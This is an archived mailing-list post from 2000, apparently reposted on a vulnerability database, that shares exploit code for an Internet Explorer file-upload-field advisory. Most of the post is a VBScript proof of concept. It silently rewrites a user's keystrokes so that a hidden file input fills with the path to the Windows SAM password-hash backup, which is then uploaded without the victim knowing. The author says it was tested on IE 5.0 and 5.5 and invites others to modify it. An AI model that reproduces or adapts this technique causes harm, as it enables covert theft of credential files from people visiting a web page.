Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1043
HistoryDec 08, 2000 - 12:00 a.m.

Exploit Code for File Input field advisory.

2000-12-0800:00:00
vulners.com
50

I have coded an exploit example for the "File Upload via Form" vulnerability
recently mentioned by Microsoft Security.

Here's the source for it (well, most of the source). If you would like the
whole source, email me. I'll send it as an attachment.

--------------snip------------------

!script language="VBScript">
'A lot of this isn't pretty, I don't have much time for this kind of stuff.
'Make changes as you wish, but be sure to include me (key) in your version.

'Declare stuff
Dim userKey
Dim charCount
Dim getFile
Dim myArray

'67|58|47|87|73|78|78|84|47|82|69|80|65|73|82|47|83|65|77|46|95
'c : \ w i n n t \ r e p a i r \ s a m . _

'Has to be backwards, that's the order I push it into the File field.
'95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67
'_ . m a s \ r i a p e r \ t n n i w \ : c

'Set getFile with the correct keycodes
getFile = "95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67"

'ReDim myArray to correct UBound
ReDim myArray(Len(getFile)/3)

'Index of array to use
charCount = 0

'Set myArray with a split version of getfile
myArray = split(getFile, "|")

'This is activated anytime form1.file gains the focus
Sub myFocus()
document.form1.userInput.focus
End Sub

'This is activated with the onKeyPress event of userInput
Sub myFuncFirst()
If charCount < (Len(getFile)/3) Then
'Find the key the user pressed
userKey = chr(window.event.keyCode)
'Change that key to the keycode we want
window.event.keyCode = cint(myArray(charCount))
'Set focus to form1.file so that our key gets sent to it
document.form1.file.focus
'Make userInput reflect the user's change
document.form1.userInput.value =
document.form1.userInput.value + userKey
'Increment charCount to the next char we want
charCount = charCount + 1
end if
End Sub
!/script>

----------snip---------

There are some issues to work out, but I believe this is a pretty good
example. Hey, it works doesn't it?

Mail me (disk_key<AT>hotmail.com) if you have questions/comments. I have
tested on IE 5.0 and IE 5.5.

Goodbye,
key


Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com